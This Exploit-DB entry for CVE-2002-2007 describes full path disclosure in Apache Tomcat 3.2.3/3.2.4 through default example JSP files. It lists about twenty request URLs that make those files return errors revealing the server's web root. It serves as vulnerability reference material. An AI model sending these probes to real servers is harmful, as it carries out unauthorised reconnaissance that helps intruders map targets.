Exploit Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure

Exploiter

18 Dec 2022
EDB-ID: 21491
EDB verification: Passed
Author: RICHARD BRAIN
Vulnerability type: REMOTE
Platform: MULTIPLE
CVE: CVE-2002-2007
Publication date: 2002-05-29
Code:
source: https://www.securityfocus.com/bid/4877/info

Apache Tomcat is a freely available, open source web server maintained by
the Apache Foundation.

When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root. 

The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp
 
Source: www.exploit-db.com
